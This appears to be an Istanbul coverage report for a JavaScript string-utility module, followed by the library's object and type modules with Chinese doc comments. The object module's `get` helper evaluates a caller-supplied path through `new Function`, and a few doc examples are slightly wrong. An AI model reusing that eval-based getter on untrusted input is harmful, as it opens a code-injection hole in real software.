<a name='L174'></a><a href='#L174'>174</a>
<a name='L175'></a><a href='#L175'>175</a>
<a name='L176'></a><a href='#L176'>176</a>
<a name='L177'></a><a href='#L177'>177</a>
<a name='L178'></a><a href='#L178'>178</a>
<a name='L179'></a><a href='#L179'>179</a>
<a name='L180'></a><a href='#L180'>180</a>
<a name='L181'></a><a href='#L181'>181</a>
<a name='L182'></a><a href='#L182'>182</a>
<a name='L183'></a><a href='#L183'>183</a>
<a name='L184'></a><a href='#L184'>184</a>
<a name='L185'></a><a href='#L185'>185</a>
<a name='L186'></a><a href='#L186'>186</a>
<a name='L187'></a><a href='#L187'>187</a>
<a name='L188'></a><a href='#L188'>188</a>
<a name='L189'></a><a href='#L189'>189</a>
<a name='L190'></a><a href='#L190'>190</a>
<a name='L191'></a><a href='#L191'>191</a>
<a name='L192'></a><a href='#L192'>192</a>
<a name='L193'></a><a href='#L193'>193</a>
<a name='L194'></a><a href='#L194'>194</a>
<a name='L195'></a><a href='#L195'>195</a>
<a name='L196'></a><a href='#L196'>196</a>
<a name='L197'></a><a href='#L197'>197</a>
<a name='L198'></a><a href='#L198'>198</a>
<a name='L199'></a><a href='#L199'>199</a>
<a name='L200'></a><a href='#L200'>200</a>
<a name='L201'></a><a href='#L201'>201</a>
<a name='L202'></a><a href='#L202'>202</a>
<a name='L203'></a><a href='#L203'>203</a>
<a name='L204'></a><a href='#L204'>204</a>
<a name='L205'></a><a href='#L205'>205</a>
<a name='L206'></a><a href='#L206'>206</a>
<a name='L207'></a><a href='#L207'>207</a>
<a name='L208'></a><a href='#L208'>208</a>
<a name='L209'></a><a href='#L209'>209</a>
<a name='L210'></a><a href='#L210'>210</a>
<a name='L211'></a><a href='#L211'>211</a>
<a name='L212'></a><a href='#L212'>212</a>
<a name='L213'></a><a href='#L213'>213</a>
<a name='L214'></a><a href='#L214'>214</a>
<a name='L215'></a><a href='#L215'>215</a>
<a name='L216'></a><a href='#L216'>216</a>
<a name='L217'></a><a href='#L217'>217</a>
<a name='L218'></a><a href='#L218'>218</a>
<a name='L219'></a><a href='#L219'>219</a>
<a name='L220'></a><a href='#L220'>220</a>
<a name='L221'></a><a href='#L221'>221</a>
<a name='L222'></a><a href='#L222'>222</a>
<a name='L223'></a><a href='#L223'>223</a>
<a name='L224'></a><a href='#L224'>224</a>
<a name='L225'></a><a href='#L225'>225</a>
<a name='L226'></a><a href='#L226'>226</a>
<a name='L227'></a><a href='#L227'>227</a>
<a name='L228'></a><a href='#L228'>228</a>
<a name='L229'></a><a href='#L229'>229</a>
<a name='L230'></a><a href='#L230'>230</a>
<a name='L231'></a><a href='#L231'>231</a>
<a name='L232'></a><a href='#L232'>232</a>
<a name='L233'></a><a href='#L233'>233</a>
<a name='L234'></a><a href='#L234'>234</a>
<a name='L235'></a><a href='#L235'>235</a>
<a name='L236'></a><a href='#L236'>236</a>
<a name='L237'></a><a href='#L237'>237</a>
<a name='L238'></a><a href='#L238'>238</a>
<a name='L239'></a><a href='#L239'>239</a>
<a name='L240'></a><a href='#L240'>240</a>
<a name='L241'></a><a href='#L241'>241</a>
<a name='L242'></a><a href='#L242'>242</a>
<a name='L243'></a><a href='#L243'>243</a>
<a name='L244'></a><a href='#L244'>244</a>
<a name='L245'></a><a href='#L245'>245</a>
<a name='L246'></a><a href='#L246'>246</a>
<a name='L247'></a><a href='#L247'>247</a>
<a name='L248'></a><a href='#L248'>248</a>
<a name='L249'></a><a href='#L249'>249</a>
<a name='L250'></a><a href='#L250'>250</a>
<a name='L251'></a><a href='#L251'>251</a>
<a name='L252'></a><a href='#L252'>252</a>
<a name='L253'></a><a href='#L253'>253</a>
<a name='L254'></a><a href='#L254'>254</a>
<a name='L255'></a><a href='#L255'>255</a>
<a name='L256'></a><a href='#L256'>256</a>
<a name='L257'></a><a href='#L257'>257</a>
<a name='L258'></a><a href='#L258'>258</a>
<a name='L259'></a><a href='#L259'>259</a>
<a name='L260'></a><a href='#L260'>260</a>
<a name='L261'></a><a href='#L261'>261</a>
<a name='L262'></a><a href='#L262'>262</a>
<a name='L263'></a><a href='#L263'>263</a>
<a name='L264'></a><a href='#L264'>264</a>
<a name='L265'></a><a href='#L265'>265</a>
<a name='L266'></a><a href='#L266'>266</a>
<a name='L267'></a><a href='#L267'>267</a>
<a name='L268'></a><a href='#L268'>268</a>
<a name='L269'></a><a href='#L269'>269</a>
<a name='L270'></a><a href='#L270'>270</a>
<a name='L271'></a><a href='#L271'>271</a>
<a name='L272'></a><a href='#L272'>272</a>
<a name='L273'></a><a href='#L273'>273</a>
<a name='L274'></a><a href='#L274'>274</a>
<a name='L275'></a><a href='#L275'>275</a>
<a name='L276'></a><a href='#L276'>276</a>
<a name='L277'></a><a href='#L277'>277</a>
<a name='L278'></a><a href='#L278'>278</a>
<a name='L279'></a><a href='#L279'>279</a>
<a name='L280'></a><a href='#L280'>280</a>
<a name='L281'></a><a href='#L281'>281</a>
<a name='L282'></a><a href='#L282'>282</a>
<a name='L283'></a><a href='#L283'>283</a>
<a name='L284'></a><a href='#L284'>284</a>
<a name='L285'></a><a href='#L285'>285</a>
<a name='L286'></a><a href='#L286'>286</a>
<a name='L287'></a><a href='#L287'>287</a>
<a name='L288'></a><a href='#L288'>288</a>
<a name='L289'></a><a href='#L289'>289</a>
<a name='L290'></a><a href='#L290'>290</a>
<a name='L291'></a><a href='#L291'>291</a>
<a name='L292'></a><a href='#L292'>292</a>
<a name='L293'></a><a href='#L293'>293</a></td><td class="line-coverage quiet"><span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">63x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-yes">6x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">6x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">6x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">9x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">6x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">1x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">13x</span>
<span class="cline-any cline-yes">13x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span></td><td class="text"><pre class="prettyprint lang-js">/** @module String */
import { isUndefined } from './type'
import { random } from './number'
/**
* 获取字符串的字节长度
* @function byteSize
* @param {string} str - 字符串
* @return {number}
* @example
* U.byteSize('日')
* // => 3
*
* U.byteSize('12')
* // => 2
*
* U.byteSize('hello')
* // => 5
*/
export const byteSize = str => new Blob([str]).size
/**
* 反转字符串
* @function reverseString
* @param {string} str - 字符串
* @return {str}
* @example
* U.reverseString('hello!')
* // => '!olleh'
*/
export const reverseString = str => [...str].reverse().join('')
/**
* 向URL追加参数
* @function stringifyURL
* @param {string} url - URL路径
* @param {object} params - 参数对象
* @return {string}
* @example
* U.stringifyURL('https://www.google.com/', {name: 'john', age: 30})
* // => 'https://www.google.com/?name=john&age=30'
*/
export const stringifyURL = (url, params) => {
url += (/\?/).test(url) ? '&' : '?'
return url += Object.keys(params).map(key => `${key}=${params[key]}`).join('&')
}
/**
* 解析URL参数
* @function parseURL
* @param {string} url - 字符串
* @return {object}
* @example
* U.parseURL('http://url.com/page?name=Adam&surname=Smith')
* // => {name: 'Adam', surname: 'Smith'}
*
* U.parseURL('https://www.google.com/')
* // => {}
*/
export const parseURL = url => {
const arr = url.match(/([^?=&]+)(=([^&]*))/g) || []
return arr.reduce((a, v) => ((a[v.slice(0, v.indexOf('='))] = v.slice(v.indexOf('=') + 1)), a), {})
}
/**
* 移除字符串中的HTML标签
* @function removeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<p>这是<em>一个</em>段落。</p>'
* U.removeHTML(str)
* // => '这是一个段落。'
*/
export const removeHTML = str => str.replace(/<[^>]*>/g, '')
/**
* 转义特殊字符
* @function escapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<a href="#">you & me</a>'
* U.escapeHTML(str)
* // => '&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;'
*/
export const escapeHTML = str => str.replace(
/[&<>"]/g,
tag => ({
'&': '&amp;',
'<': '&lt;',
'>': '&gt;',
'"': '&quot;'
}[tag] || <span class="branch-1 cbranch-no" title="branch not covered" >tag)</span>
)
/**
* 反转义特殊字符
* @function unescapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;'
* U.unescapeHTML(str)
* // => '<a href="#">you & me</a>'
*/
export const unescapeHTML = str => str.replace(
/&amp;|&lt;|&gt;|&quot;/g,
tag => ({
'&amp;': '&',
'&lt;': '<',
'&gt;': '>',
'&quot;': '"'
}[tag] || <span class="branch-1 cbranch-no" title="branch not covered" >tag)</span>
)
/**
* 使用指定的掩码字符替换start~end之间的所有字符
* @function mask
* @param {string|number} str - 字符串
* @param {number} [start=0] - 可选,开始位置,默认为0(即字符串开头)
* @param {number} [end=0] - 可选,结束位置,默认为0(即字符串结尾)
* @param {string} [mask='*'] - 可选,掩码字符,默认为'*'号
* @return {string}
* @example
* U.mask(123456789) // => *********
* U.mask(123456789, 3) // => 123******
* U.mask(str, 0, 4) // => *****6789
* U.mask(str, 3, 4) // => 123**6789
* U.mask(str, 3, 4, '&') // => 123&&6789
*/
export const mask = (str, start = 0, end = 0, mask = '*') => [...`${str}`].map(
(v, i) => i >= start && i < `${str}`.length - end ? mask : v
).join('')
/**
* 随机生成16进制色值
* @function randomHex
* @return {string}
* @example
* U.randomHex()
* // => "#f13ba7"
*/
export const randomHex = <span class="fstat-no" title="function not covered" >()</span> => <span class="cstat-no" title="statement not covered" >'#' + (Math.random() * 0xfffff * 1000000).toString(16).slice(0, 6)</span>
/**
* 随机生成rgba色值
* @function randomRgba
* @param {number} [min=0] - 可选,最小色阶
* @param {number} [max=256] - 可选,最大色阶
* @param {number} [alpha=1] - 可选,透明度
* @return {string}
* @example
* U.randomRgba()
* // => rgba(223,135,252,1)
*
* U.randomRgba(154, 211, 0.5)
* // => rgba(191,178,179,0.5)
*/
export const randomRgba = (min = 0, max = 256, alpha = 1) => {
const color = Array.from({ length: 3 })
.reduce(acc => [...acc, Math.floor(random(min, max))], [])
.concat(alpha ? [alpha] : <span class="branch-1 cbranch-no" title="branch not covered" >[0])</span>
.join(',')
return `rgba(${color})`
}
/**
* 将3位16进制色值转为6位
* @function extendHex
* @param {string} shortHex - 字符串
* @return {string}
* @example
* U.extendHex('#03f')
* // => '#0033ff'
*
* U.extendHex('05a')
* // => '#0055aa'
*/
export const extendHex = shortHex => {
return '#' + shortHex.slice(shortHex.startsWith('#') ? 1 : 0)
.split('')
.map(x => x + x)
.join('')
}
/**
* 将16进制hex色值转为rgb(或rgba)色值
* @function hexToRGB
* @param {string} hex - 字符串,16进制hex色值
* @param {number} alpha - 可选,色彩透明度
* @return {string}
* @example
* U.hexToRGB('#e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('#e5f', 0.5)
* // => rgba(238,85,255,0.5)
*/
export const hexToRGB = (hex, alpha) => {
const hasAlpha = !isUndefined(alpha)
let result = hex.slice(hex.startsWith('#') ? 1 : 0)
if (result.length === 3) result = [...result].map(s => s + s).join('')
result = result.match(/[0-9a-f]{2}/gi)
.map(s => parseInt(s, 16))
.concat(hasAlpha ? [alpha] : [])
.join(',')
return `rgb${hasAlpha ? 'a' : ''}(${result})`
}
/**
* 将rgb(或rgba)色值转为16进制hex色值
* @function RGBToHex
* @param {string} rgb - 字符串,rgb(或rgba)色值
* @return {string}
* @example
* U.RGBToHex('rgb(238,85,255)')
* // => #ee55ff
*
* U.RGBToHex('rgba(238,85,255,0.5)')
* // => #ee55ff
*/
export const RGBToHex = rgb => {
return '#' + rgb.match(/\d{1,3}/g)
.slice(0, 3)
.map(s => Number(s).toString(16).padStart(2, '0'))
.join('')
}
/**
* 解析cookie字符串
* @function parseCookie
* @param {string} str - 字符串
* @return {object}
* @example
* U.parseCookie('taken=bar; equation=E%3Dmc%5E2')
* // => {taken: 'bar', equation: 'E=mc^2'}
*/
export const parseCookie = str => {
return str.split(';')
.map(v => v.split('='))
.reduce((acc, v) => {
acc[decodeURIComponent(v[0].trim())] = decodeURIComponent(v[1].trim())
return acc
}, {})
}
/**
* 字符串转日期对象
* @function stringToDate
* @param {string} str - 字符串
* @return {date}
* @example
* U.stringToDate('2019/5-06').toString()
* // => Mon May 06 2019 00:00:00 GMT+0800 (中国标准时间)
*
* U.stringToDate('2019-5-06 20:21:22:500').toString()
* // => Mon May 06 2019 20:21:22 GMT+0800 (中国标准时间)
*/
export const stringToDate = str => {
const defs = [0, 1, 1, 0, 0, 0]
const args = str.split(/[^0-9]+/).map((v, i) => {
const val = Number(v) || defs[i]
return i === 1 ? (val - 1) : val
})
return new Date(...args)
}
/**
* 驼峰字符串转横线连接字符串
* @function camelToDash
* @param {string} str - 驼峰字符串
* @return {string}
* @example
* U.camelToDash('camelCase')
* => 'camel-case'
*/
export const camelToDash = str => str.replace(/([A-Z])/g,"-$1").toLowerCase()
/**
* 横线连接字符串转驼峰字符串
* @function dashToCamel
* @param {string} str - 横线连接字符串
* @return {string}
* @example
* U.camelToDash('dash-case')
* => 'dashCase'
*/
export const dashToCamel = str => str.replace(/\-(\w)/g, (a, l) => l.toUpperCase())
</pre></td></tr>
</table></pre>
<div class='push'></div><!-- for sticky footer -->
</div><!-- /wrapper -->
<div class='footer quiet pad2 space-top1 center small'>
Code coverage
generated by <a href="https://istanbul.js.org/" target="_blank">istanbul</a> at Thu Mar 12 2020 22:25:25 GMT+0800 (GMT+08:00)
</div>
</div>
<script src="prettify.js"></script>
<script>
window.onload = function () {
if (typeof prettyPrint === 'function') {
prettyPrint();
}
};
</script>
<script src="sorter.js"></script>
<script src="block-navigation.js"></script>
</body>
</html>
<|start_filename|>src/object.js<|end_filename|>
/** @module Object */
import { isObject } from './type'
/**
* 对象深复制函数
* @function deepClone
* @param {object} obj - 深复制的源对象
* @return {object}
* @example
* var a = { foo: 'bar', obj: { a: 1, b: 2 } }
* var b = U.deepClone(a)
* b.foo = 'foo'
* // => a = { foo: 'bar', obj: { a: 1, b: 2 } }, b = { foo: 'foo', obj: { a: 1, b: 2 } }
*/
export const deepClone = obj => {
let clone = Object.assign({}, obj)
Object.keys(clone).forEach(k => {
clone[k] = isObject(obj[k]) ? deepClone(obj[k]) : obj[k]
})
return Array.isArray(obj) ? (clone.length = obj.length) && Array.from(clone) : clone
}
/**
* 对象深冻结函数
* @function deepFreeze
* @param {object} obj - 深冻结的源对象
* @return {object}
* @example
* let arr = [1, [2, 3]]
* const o = U.deepFreeze(arr)
* o[0] = 3
* o[1][0] = 4
* // => arr = [1, [2, 3]], o = [1, [2, 3]]
*/
export const deepFreeze = obj => {
Object.keys(obj).forEach(prop => {
if (obj[prop] instanceof Object && obj[prop] !== null) {
deepFreeze(obj[prop])
}
})
return Object.freeze(obj)
}
/**
* 重命名对象的key名称。
* @function renameKeys
* @param {object} map - 由oldKey:newKey键值对组成的对象
* @param {object} obj - 目标对象
* @return {object}
* @example
* let obj = {name: 'john', job: 'fonts', detail: [1, 2]}
* U.renameKeys({job: 'possion'}, obj)
* // => { name: 'john', possion: 'fonts', detail: [ 1, 2 ] }
*/
export const renameKeys = (map, obj) => (
Object.keys(obj)
.reduce((acc, key) => ({
...acc,
...{ [map[key] || key]: obj[key] }
}), {})
)
/**
* 从对象中省略与给定键对应的键值对。
* @function omit
* @param {object} obj - 目标对象
* @param {array} arr - 省略的键名数组
* @return {object}
* @example
* U.omit({ a: 1, b: '2', c: 3 }, ['b'])
* // => { a: 1, c: 3 }
*/
export const omit = (obj, arr) => (
Object.keys(obj)
.filter(k => !arr.includes(k))
.reduce((acc, key) => ((acc[key] = obj[key]), acc), {})
)
/**
* 判断val是否是空对象。
* @function isEmpty
* @param {*} val - 检查的对象
* @return {boolean}
* @example
* U.isEmpty(new Map()) // => true
* U.isEmpty(new Set()) // => true
* U.isEmpty({}) // => true
* U.isEmpty([]) // => true
* U.isEmpty('') // => true
* U.isEmpty({a: 1}) // => false
* U.isEmpty([2]) // => false
* U.isEmpty('text') // => false
* U.isEmpty(123) // => true
* U.isEmpty(true) // => true
* U.isEmpty(false) // => true
*/
export const isEmpty = val => !(Object.keys(val) || val).length
/**
* 根据obj对象的path路径获取值。
* @function get
* @param {object} obj - 要检索的对象
* @param {string} path - 要获取属性的路径
* @return {*}
* @example
* const obj = {name: 'joe', child: [{name: 'john', child: null}]}
* U.get(obj, 'child[0].name')
* // => 'john'
*/
export const get = (obj, path) => new Function('obj', 'return obj.' + path)(obj)
<|start_filename|>src/type.js<|end_filename|>
/** @module Type */
/**
* 返回val的类型。
* @function getType
* @param {*} val - 需要检查的值。
* @return {string}
* @example
* U.getType(new Set([1, 2]))
* // => 'set'
*/
export const getType = val => (
isUndefined(val) ? 'undefined' : isNull(val) ? 'null' : val.constructor.name.toLowerCase()
)
/**
* 检查value是否为number类型。使用typeof来检查,返回布尔值。
* @function isNumber
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isNumber(3)
* // => true
*
* U.isNumber(Number.MIN_VALUE)
* // => true
*
* U.isNumber(Infinity)
* // => true
*
* U.isNumber('3')
* // => false
*/
export const isNumber = value => typeof value === 'number'
/**
* 检查值是否为字符串。使用typeof来检查,返回布尔值。
* @function isString
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isString(3)
* // => false
*
* U.isString('3')
* // => true
*/
export const isString = value => typeof value === 'string'
/**
* 检查值是否为null对象。使用typeof来检查,返回布尔值。
* @function isNull
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isNull(3)
* // => false
*
* U.isNull(null)
* // => true
*/
export const isNull = value => value === null
/**
* 检查值是否为undefined对象。使用typeof来检查,返回布尔值。
* @function isUndefined
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isUndefined(undefined)
* // => true
*
* U.isUndefined(null)
* // => false
*/
export const isUndefined = value => value === undefined
/**
* 检查值是否为布尔值。使用typeof来检查,返回布尔值。
* @function isBoolean
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isBoolean(false)
* // => true
*
* U.isBoolean(null)
* // => false
*/
export const isBoolean = value => typeof value === 'boolean'
/**
* 检查值是否为symbol类型。使用typeof来检查,返回布尔值。
* @function isSymbol
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isSymbol(Symbol('x'))
* // => true
*/
export const isSymbol = value => typeof value === 'symbol'
/**
* 检查值是否为function类型。使用typeof来检查,返回布尔值。
* @function isFunction
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isFunction(3)
* // => false
*
* U.isFunction(function () {})
* // => true
*/
